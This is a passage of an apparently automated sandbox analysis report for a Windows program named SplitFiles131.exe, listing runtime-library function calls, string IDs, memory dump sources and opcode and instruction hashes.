                                          • Instruction Fuzzy Hash: 3DC16275F40214AFDB20DAA9DC86FDFB7F8AF48704F54016AFA05FB282D67499408B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3907804496
                                          • Opcode ID: 8f4f84f8da90cf00b070d342344e91b5c399ffd5b14068e3114e3e9a8c8d54fe
                                          • Instruction ID: 414b9fb87afc50a8a3d8bfe03c00f007ed18bb814e769fe5a88ecae7e3a98d83
                                          • Opcode Fuzzy Hash: 8f4f84f8da90cf00b070d342344e91b5c399ffd5b14068e3114e3e9a8c8d54fe
                                          • Instruction Fuzzy Hash: ACC106F0E08245AFDF15DF99C881BEE7BB5AF49304F04405AE415AB392C7789AC1CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 0041220F
                                          • type_info::operator==.LIBVCRUNTIME ref: 00412231
                                          • ___TypeMatch.LIBVCRUNTIME ref: 00412340
                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 00412412
                                          • _UnwindNestedFrames.LIBCMT ref: 00412496
                                          • CallUnexpected.LIBVCRUNTIME ref: 004124B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                          • String ID: csm$csm$csm
                                          • API String ID: 2123188842-393685449
                                          • Opcode ID: d5dfb756700b109f77bad092a4cf65170d38a92c2de80a3b210a90049ee47108
                                          • Instruction ID: 21aa7bd5de75da7cd703e37400f2b4a3502758b12b2b00924095f405172d1fb9
                                          • Opcode Fuzzy Hash: d5dfb756700b109f77bad092a4cf65170d38a92c2de80a3b210a90049ee47108
                                          • Instruction Fuzzy Hash: 4CB1A031800219EFCF15DFA5DA819EEB7B5FF18314B10405BE914AB311D7B8EAA1CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 10004D1E
                                          • type_info::operator==.LIBVCRUNTIME ref: 10004D40
                                          • ___TypeMatch.LIBVCRUNTIME ref: 10004E4F
                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 10004F21
                                          • _UnwindNestedFrames.LIBCMT ref: 10004FA5
                                          • CallUnexpected.LIBVCRUNTIME ref: 10004FC0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                          • String ID: csm$csm$csm
                                          • API String ID: 2123188842-393685449
                                          • Opcode ID: c280cf51245476ab5a6ca9c2466aed320dec0198e46a52e5e0ca7a664b3de09a
                                          • Instruction ID: 240bac43b3023af98cd0cad224976453cf76ecf695f899d999e54e670dd59ab9
                                          • Opcode Fuzzy Hash: c280cf51245476ab5a6ca9c2466aed320dec0198e46a52e5e0ca7a664b3de09a
                                          • Instruction Fuzzy Hash: 98B1A0B5C0024AEFEF14CF94C88199E77B5FF04391F12416AE8156B21ADB31EA51CF99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 0041CA61
                                            • Part of subcall function 0041E2B8: HeapFree.KERNEL32(00000000,00000000,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?), ref: 0041E2CE
                                            • Part of subcall function 0041E2B8: GetLastError.KERNEL32(?,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?,?), ref: 0041E2E0
                                          • _free.LIBCMT ref: 0041CA6D
                                          • _free.LIBCMT ref: 0041CA78
                                          • _free.LIBCMT ref: 0041CA83
                                          • _free.LIBCMT ref: 0041CA8E
                                          • _free.LIBCMT ref: 0041CA99
                                          • _free.LIBCMT ref: 0041CAA4
                                          • _free.LIBCMT ref: 0041CAAF
                                          • _free.LIBCMT ref: 0041CABA
                                          • _free.LIBCMT ref: 0041CAC8
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 064518bb8398a549d41507d19e53a4755c223495735e655d29204e71220b294f
                                          • Instruction ID: 5b4a2eb99e861f4b6b1488fadc0f121773fdfa5924bf458925bca44d6de24a48
                                          • Opcode Fuzzy Hash: 064518bb8398a549d41507d19e53a4755c223495735e655d29204e71220b294f
                                          • Instruction Fuzzy Hash: B021C076900108AFDB45EF96C891DDD7BB8BF08344F8041AAF5199B261D775DA84CB84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: db551eddc28ed9585e28f7d8a930085c69e0a83f508d5c587fb4fce91d87a741
                                          • Instruction ID: b5acc537e47175a484598864f7b5fa9eab7981bf784aec42cf186d38ae6ea6e0
                                          • Opcode Fuzzy Hash: db551eddc28ed9585e28f7d8a930085c69e0a83f508d5c587fb4fce91d87a741
                                          • Instruction Fuzzy Hash: 9821B67690010CBFDF41EF96C881DDE7BB8AF08344F0081AAF6159B121DB35EA958B88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 81c439588ecf3f878c2d47a34354f57c6a02997bda065798a73a88b2c9937e33
                                          • Instruction ID: 867ad9f989b00400d9638a76b2324434a93f572cdeb18d7cd5bb1e105d022b7d
                                          • Opcode Fuzzy Hash: 81c439588ecf3f878c2d47a34354f57c6a02997bda065798a73a88b2c9937e33
                                          • Instruction Fuzzy Hash: 8321957A914108EFDB41DF94C841DDE7BB9FF08384B6081A6F9599B125EA32EA448F90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,D0547283,?,?), ref: 1000201A
                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000001), ref: 100021C1
                                          • GetLastError.KERNEL32 ref: 100021CF
                                          • GetTempPathA.KERNEL32(00000104,?), ref: 100021EC
                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000001), ref: 10002389
                                          • GetLastError.KERNEL32 ref: 10002393
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLastPath$FolderTemp
                                          • String ID: APPDATA$TMPDIR
                                          • API String ID: 519037321-4048745339
                                          • Opcode ID: 2df08be5817bc88c7724805b3209b62b20567340b0953353b922b6276f4cf695
                                          • Instruction ID: 73a1d6a44cef61f255837fd76ca3bed7767395f6b845790b902de768a736ecff
                                          • Opcode Fuzzy Hash: 2df08be5817bc88c7724805b3209b62b20567340b0953353b922b6276f4cf695
                                          • Instruction Fuzzy Hash: 41D1B271A042589FFB25CB24CC88B9DB7B5EF45340F1082D8E44AA7299D775AB84CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042BA9F), ref: 0042ADCA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DecodePointer
                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                          • API String ID: 3527080286-3064271455
                                          • Opcode ID: 26b296a4fed531b61828374a93348b370b4dc10c97bd2c2867f99b54bc7a72f6
                                          • Instruction ID: 9a0aa79b74204bca965e26bff41110038d07c872e789de07625a36b1bd30ca62
                                          • Opcode Fuzzy Hash: 26b296a4fed531b61828374a93348b370b4dc10c97bd2c2867f99b54bc7a72f6
                                          • Instruction Fuzzy Hash: CC5180B0A0052ACBCB148F99FA4C1AEBB74FB08304F964087EC51A7254C77C89768B5F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 1adb941b9abc843823b6cecc210d72ab4751bd57d712c87c9e49a8cfc94ca12c
                                          • Instruction ID: c7266049f18fbd2a82f263cfe4493866a99ee9702eead5b57a4a5b9491e875f7
                                          • Opcode Fuzzy Hash: 1adb941b9abc843823b6cecc210d72ab4751bd57d712c87c9e49a8cfc94ca12c
                                          • Instruction Fuzzy Hash: 34611671A007159FEB20DF66E841BABB7F8AF44314FA0456FE945EB381E774AC408B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040C5D9
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040C5FB
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C61B
                                          • __Getctype.LIBCPMT ref: 0040C6B1
                                          • std::_Facet_Register.LIBCPMT ref: 0040C6D0
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C6E8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                          • String ID: B@
                                          • API String ID: 1102183713-1939862501
                                          • Opcode ID: 3bfcd95a1d60704c14d7630784b95f2b5bd9d64dce3bb454e3c0f79256cf6333
                                          • Instruction ID: 6ac1ce246c7cb2948fc285676951677c035abaaa7204644bef92127c1cfd88d1
                                          • Opcode Fuzzy Hash: 3bfcd95a1d60704c14d7630784b95f2b5bd9d64dce3bb454e3c0f79256cf6333
                                          • Instruction Fuzzy Hash: 8541AF71900214CBCB20DF55D881BAEB7B4EB14714F144A7EE846B7382DB3AAD05CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$___from_strstr_to_strchr
                                          • String ID:
                                          • API String ID: 3409252457-0
                                          • Opcode ID: 4e14be396917b90d40ada6c8054fde6103272dd0e98e2066e88c24aaefcf9db6
                                          • Instruction ID: c24dd6349b25f5b46de012d200697a2dc7ab1927184a9c428c04661f96352079
                                          • Opcode Fuzzy Hash: 4e14be396917b90d40ada6c8054fde6103272dd0e98e2066e88c24aaefcf9db6
                                          • Instruction Fuzzy Hash: CB510E70B04321AFEB21BF75A851ABE7BE8EF81314F81416FE91497281DB3D85418B5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: _free$___from_strstr_to_strchr
                                          • String ID:
                                          • API String ID: 3409252457-0
                                          • Opcode ID: a0c36db041c6394aca0add2f8b723cd2806df39da9a9d26740de4ca1c8323699
                                          • Instruction ID: 381467da00f9b5958bd928ec2253f49b5b741610b1117f8a7471ff7dbb655abb
                                          • Opcode Fuzzy Hash: a0c36db041c6394aca0add2f8b723cd2806df39da9a9d26740de4ca1c8323699
                                          • Instruction Fuzzy Hash: 5F51F475904212AFFB10DF788C81A5E7BF4FF063D0B11826DE9149718AEB72DA81CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0040EA1E
                                          • __alloca_probe_16.LIBCMT ref: 0040EA4A
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0040EA89
                                          • LCMapStringEx.KERNEL32 ref: 0040EAA6
                                          • LCMapStringEx.KERNEL32 ref: 0040EAE5
                                          • __alloca_probe_16.LIBCMT ref: 0040EB02
                                          • LCMapStringEx.KERNEL32 ref: 0040EB44
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040EB67
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                          • String ID:
                                          • API String ID: 2040435927-0
                                          • Opcode ID: dbe60554392ac3eae939534d336e4110778e17a30d238082d0c9db6a49dad1a4
                                          • Instruction ID: bae1dc4957788a08111944ff1eaf9dbc1280390a613fb653b58dfa13e10e978f
                                          • Opcode Fuzzy Hash: dbe60554392ac3eae939534d336e4110778e17a30d238082d0c9db6a49dad1a4
                                          • Instruction Fuzzy Hash: 6351A172600205ABEF209F62CC45FAB7BB9EB44750F15483AFD05A62D0D778ED21CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041CB63: GetLastError.KERNEL32(?,?,?,00413661,?,00000000,00405D9E,?,00418194,?,00000000,76686490,?,0041828D,00405D9E,00000000), ref: 0041CB68
                                            • Part of subcall function 0041CB63: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00418194,?,00000000,76686490,?,0041828D,00405D9E,00000000,?,00405D9E,?), ref: 0041CC06
                                          • _free.LIBCMT ref: 0041C1E7
                                          • _free.LIBCMT ref: 0041C200
                                          • _free.LIBCMT ref: 0041C23E
                                          • _free.LIBCMT ref: 0041C247
                                          • _free.LIBCMT ref: 0041C253
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorLast
                                          • String ID: C
                                          • API String ID: 3291180501-1037565863
                                          • Opcode ID: db53cc3fb368b299e4ebc727ca1c17a56f226d76f8d2124a3b5b37d9cb2993de
                                          • Instruction ID: ef45604bd07060d4e86bdf097be434cf7ae4fa59a7229b5fd9910e1095f225e5
                                          • Opcode Fuzzy Hash: db53cc3fb368b299e4ebc727ca1c17a56f226d76f8d2124a3b5b37d9cb2993de
                                          • Instruction Fuzzy Hash: 19B13775A412199BDB24DF59CC84AEAB7B4FB48304F5045AEE809A7391D734AED0CF88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __alloca_probe_16.LIBCMT ref: 00421286
                                          • __alloca_probe_16.LIBCMT ref: 0042134C
                                          • __freea.LIBCMT ref: 004213B8
                                            • Part of subcall function 0041ED2F: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041ED61
                                          • __freea.LIBCMT ref: 004213C1
                                          • __freea.LIBCMT ref: 004213E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                          • String ID: tIB
                                          • API String ID: 1423051803-366005614
                                          • Opcode ID: 8bcbbfb6db70486236c34e29ace3ccf3bdd9e9482cebc72fef7cc3ecca7d4215
                                          • Instruction ID: af5f65ccc48ee5d63aac88402d645400baba8313a5c2bd7b01ea6e1089fcebf7
                                          • Opcode Fuzzy Hash: 8bcbbfb6db70486236c34e29ace3ccf3bdd9e9482cebc72fef7cc3ecca7d4215
                                          • Instruction Fuzzy Hash: E8511472700226ABEF209E55EC41FBF36AADF60754F64016BFC04E6260E73CDD5186A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __RTC_Initialize.LIBCMT ref: 1000341D
                                          • ___scrt_uninitialize_crt.LIBCMT ref: 10003437
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: Initialize___scrt_uninitialize_crt
                                          • String ID:
                                          • API String ID: 2442719207-0
                                          • Opcode ID: fb96ed7170912c531198425769cf64f804bb219cb4c682d5ecc3c1bbbb0e391b
                                          • Instruction ID: f2d724fec1a198361f11823c952c0a5602674603fef4946e569f0555ef38e7cd
                                          • Opcode Fuzzy Hash: fb96ed7170912c531198425769cf64f804bb219cb4c682d5ecc3c1bbbb0e391b
                                          • Instruction Fuzzy Hash: CB41C372D04A65ABFB13CF64CC42B9F7BACEB446D2F11C119F8446A269D730AE418B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 0043EA97
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0043EA9F
                                          • _ValidateLocalCookies.LIBCMT ref: 0043EB28
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0043EB53
                                          • _ValidateLocalCookies.LIBCMT ref: 0043EBA8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 97abf38324731e32aa54c8af95c8715b679c63eee41a74b9c7ea5a5f1bcbe85c
                                          • Instruction ID: 56324905b5cf03f36623b407c9bca58900183bbae34251306b30c85aa47bf572
                                          • Opcode Fuzzy Hash: 97abf38324731e32aa54c8af95c8715b679c63eee41a74b9c7ea5a5f1bcbe85c
                                          • Instruction Fuzzy Hash: A941EB30A01208EBCF10DF6AC885A9EBBB1FF4C318F14915AE8155B3D2C779E911CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 00411C17
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00411C1F
                                          • _ValidateLocalCookies.LIBCMT ref: 00411CA8
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00411CD3
                                          • _ValidateLocalCookies.LIBCMT ref: 00411D28
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: e0701a756b8fd532e6c54edd9633cc2f37b64c963fcb2cfba846efdf3320919d
                                          • Instruction ID: bee35b64c31f227da84885fae90110515caed0ba2fa3c8c6cd36066413939370
                                          • Opcode Fuzzy Hash: e0701a756b8fd532e6c54edd9633cc2f37b64c963fcb2cfba846efdf3320919d
                                          • Instruction Fuzzy Hash: 81412B30E002089BCF10DF69C880ADEBBB1EF05318F54805BEA149B361E779DA95CBD9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 10004547
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 1000454F
                                          • _ValidateLocalCookies.LIBCMT ref: 100045D8
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 10004603
                                          • _ValidateLocalCookies.LIBCMT ref: 10004658
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 71993e02da73fe6ea8203d8663dbfd28e3c5aac2b87050cf1c64cbd4c7b0a4a1
                                          • Instruction ID: e65ff753308d278a6817090cc45740b4f84ab4a7cb3d59c0f71bc0a74e6c746d
                                          • Opcode Fuzzy Hash: 71993e02da73fe6ea8203d8663dbfd28e3c5aac2b87050cf1c64cbd4c7b0a4a1
                                          • Instruction Fuzzy Hash: 4141C378E00218EBEF00CF68CC84A9E7BF5EF452A5F118055E8149B356DB72EA11CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • C:\Program Files (x86)\Split Files\SplitFiles131.exe, xrefs: 00424208
                                          • VCB, xrefs: 00424254
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Program Files (x86)\Split Files\SplitFiles131.exe$VCB
                                          • API String ID: 0-2544648200
                                          • Opcode ID: 69ef0a19d16ed832991be1ac6899432db3f95619588f9b7e4da384f3d8da2b51
                                          • Instruction ID: ff3a756bc587a2ce23644913c84b3eb2307a4a6ea4fbf3a266a3dc89f95f590a
                                          • Opcode Fuzzy Hash: 69ef0a19d16ed832991be1ac6899432db3f95619588f9b7e4da384f3d8da2b51
                                          • Instruction Fuzzy Hash: FB21F231300225FF9B20AF63EC40E6B739DEF807A8751465AF91597241E738ED818778
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 0-537541572
                                          • Opcode ID: f5ec6ee9c4a828023a9cd68abdd904a08f9a9bc1d08a35ee3d13f4932bbadbf7
                                          • Instruction ID: a070aaca4d8e33c421c8892c34a803ef62d39d78bd865ca4f18396a08a3380d9
                                          • Opcode Fuzzy Hash: f5ec6ee9c4a828023a9cd68abdd904a08f9a9bc1d08a35ee3d13f4932bbadbf7
